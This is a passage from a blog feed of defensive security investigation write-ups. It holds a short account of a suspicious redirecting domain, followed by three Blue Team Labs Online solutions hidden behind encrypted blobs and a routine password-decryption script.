of www, ww1, ww2. The page you return on can vary as well. The majority of the time it took me to a page stating the domain was for sale, even though a <code>whois</code> clearly indicates it's registered and valid until 2023:</dot></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-19.webp"/></p> <p>whois record</p> <p>Only on rare occasions could I get it to redirect me to some other site such as the job posting site. It must have some sort of randomization feature on where it redirects you. I have tried clearing my cache/cookies each time as well but the majority of the time I always got some sort of for sale page. The "for sale" page was some variation of the following:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/04/image-20.webp"/></p> <p>random google ad links</p> <p>Clicking any of the links just grabbed info from google but kept you on the site. Presumably they earned a few cents for each click as ad revenue maybe? It's definitely an odd link as sometimes it would fire out to someplace else, but mostly would just show for sale.</p>2022-04-20T12:22:46-04:002022-04-20T12:22:46-04:00Eric Turnertag:blog.ericturner.it,2022-04-20:/2022/04/20/btlo-investigation-xhell/

This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.

<div id="pec-encrypted-content" style="display:none">Vq+xdDQyptaHQkbbtL7g0g==;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;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-04-15T12:47:14-04:002022-04-15T12:47:14-04:00Eric Turnertag:blog.ericturner.it,2022-04-15:/2022/04/15/btlo-investigation-link/

This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.

<div id="pec-encrypted-content" style="display:none">x9jfk+hdt8QT9oUwKGIIrw==;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;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2022-04-11T17:54:24-04:002022-04-11T17:54:24-04:00Eric Turnertag:blog.ericturner.it,2022-04-11:/2022/04/11/btlo-investigation/

This investigation is currently active on Blue Team Labs Online, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution. In special circumstances, you may email me for the password.

<div id="pec-encrypted-content" style="display:none">aaUQLMMeuzcCkzyXpmafHg==;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;^</div> <div id="pec-decrypted-content"> <h4><i>This investigation is currently active on Blue Team 